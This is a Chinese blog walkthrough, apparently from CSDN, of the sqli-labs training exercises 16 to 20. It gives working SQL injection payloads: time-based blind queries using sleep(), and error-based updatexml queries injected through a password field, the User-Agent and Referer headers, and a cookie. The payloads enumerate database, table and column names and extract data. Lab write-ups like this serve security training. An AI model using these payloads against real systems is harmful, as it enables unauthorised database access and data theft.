sqli labs 16-20

16
判断数据库长度admin") and if(length(database())=8,sleep(5),1)#
判断数据库第一个字母admin") and if(substr(database(),1,1)='s',sleep(5),1)#
依次判断完,为security
再判断表长admin") and if(length((select table_name from information_schema.tables where table_schema='security' limit 3,1))=5,sleep(5),1)#
表名admin") and if(substr((select table_name from information_schema.tables where table_schema='security' limit 3,1),1,1)='u',sleep(5),1)#
依次判断完,为users
再接着判断列,数据用相同的盲注方法

17
此题注入点在new password,先在User Name 中输入admin
再在new password中输入uname=admin&passwd=admin' and updatexml(1,concat(0x7e, database(),0x7e),1)#得数据库名称在这里插入图片描述
再爆表名,new password中输入admin会出错,就用1代替1' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security'),0x7e),1) #片

在这里插入图片描述
爆列名1' and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users'),0x7e),1) #
在这里插入图片描述
爆数据,因为爆USER出现错误,就爆emails1' and updatexml(1,concat(0x7e,(select group_concat(id) from emails),0x7e),1) #
在这里插入图片描述
18
在火狐插件ModHeader填写相关信息及爆库,再在usename password中输入正确密码admin,得数据库名称
在这里插入图片描述
爆表,同样在插件中进行输入’ or updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=‘security’),0x7e),1) or ‘1’='1,再输入密码
在这里插入图片描述
爆列,与前面一样
在这里插入图片描述
爆数据
在这里插入图片描述
19
这道题和前一道相似,只需将User-Agent改为Referer
在这里插入图片描述
爆库在这里插入图片描述
爆表在这里插入图片描述爆列在这里插入图片描述
爆数据在这里插入图片描述

20
在火狐插件Cookie Editor中进行操作,爆库,再将页面刷新
在这里插入图片描述
在这里插入图片描述
爆表
在这里插入图片描述
在这里插入图片描述
爆列
在这里插入图片描述
爆数据
在这里插入图片描述

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值